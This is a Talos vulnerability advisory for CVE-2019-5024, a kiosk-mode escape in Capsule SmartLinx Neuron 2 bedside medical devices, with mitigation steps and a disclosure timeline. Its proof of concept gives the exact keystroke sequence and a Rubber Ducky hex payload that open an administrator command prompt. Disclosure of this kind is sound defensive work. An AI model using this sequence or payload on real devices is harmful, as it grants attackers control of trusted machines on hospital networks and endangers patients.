Talos Vulnerability Report

TALOS-2019-0785

Capsule Technologies SmartLinx Neuron 2 restricted environment protection mechanism failure vulnerability

April 8, 2019
CVE Number

CVE-2019-5024

Summary

A restricted environment escape vulnerability exists in the "kiosk mode" function of Capsule Technologies SmartLinx Neuron 2 medical information collection devices running version 6.9.1. A specific series of keyboard inputs can escape the restricted environment, resulting in full administrator access to the underlying operating system. An attacker can connect to the device via USB port with a keyboard or other HID device to trigger this vulnerability.

Tested Versions

Capsule Technologies SmartLinx Neuron 2 6.9.1

Testing was conducted on a legacy version of the software which is no longer supported by Capsule Technologies. However, Talos is aware that the vulnerable version is being used in hospital environments and is therefore releasing this advisory.

Product URLs

https://www.capsuletech.com/capsule

CVSSv3 Score

7.6 - CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-693: Protection Mechanism Failure

Details

The Capsule Technologies SmartLinx Neuron 2 is a "bedside mobile clinical computer that enables the automatic collection of vital signs data. It features local data storage, and connects to the hospital network" and "is the core hardware component of Capsuleā„¢ medical device information system, according to the manufacturer.

The devices feature a restricted environment, commonly referred to as "kiosk mode," to prevent a user from exiting the running applications and accessing the underlying operating system. It is possible to connect a USB keyboard or other HID device and, through a series of specific keystrokes, escape this restricted environment and access the Microsoft Windows operating system with full administrator permissions. This access could provide an attacker with full control of a trusted device on a hospital's internal network.

Exploit Proof of Concept

Connect a USB keyboard to the device. Entering the following keystrokes will escape the restricted environment and open an operating system command prompt with administrator privileges.

ALT
DOWN 6 times
ENTER*
SHIFT 5 times
SHIFT-TAB
SPACE
SHIFT-TAB
SPACE
cmd.exe
ENTER

*may need to perform steps 1-3 two times

Alternatively, programming a USB Rubber Ducky with the following "duck code" will automatically yeild the same results as the above.

00000000: 00ff 00ff 00ff 00ff 00ff 00ff 00ff 00ff ................
00000010: 00ff 00ff 00ff 00c3 0204 00ff 00ff 00ff ................
00000020: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000030: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000040: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000050: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000060: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000070: 00ff 00ff 00eb 2800 0202 0202 0202 0202 ......(.........
00000080: 0202 00ff 00ff 00ff 00eb 2b02 2c00 00ff ..........+.,...
00000090: 00ff 00ff 00eb 2b02 2c00 00ff 00ff 00ff ......+.,.......
000000a0: 00eb 0600 1000 0700 2800 ........(.

Mitigation

Apply vendor software updates. The current version (10.1) is reportedly unaffected by the vulnerability as described in this advisory.

Restrict physical access to vulnerable devices and ensure they remain outside of the organization's security perimeter. Ensure data or communications from said devices are not implicitly trusted by internal systems. If possible, physically disable or obstruct access to USB ports on vulnerable devices. Monitor logs for signs of connections of unauthorized peripherals to vulnerable devices.

Timeline

2019-02-26 - Vendor Disclosure
2019-02-28 - Vendor tested & confirmed does not reproduce on Version 10.1
2019-04-08 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.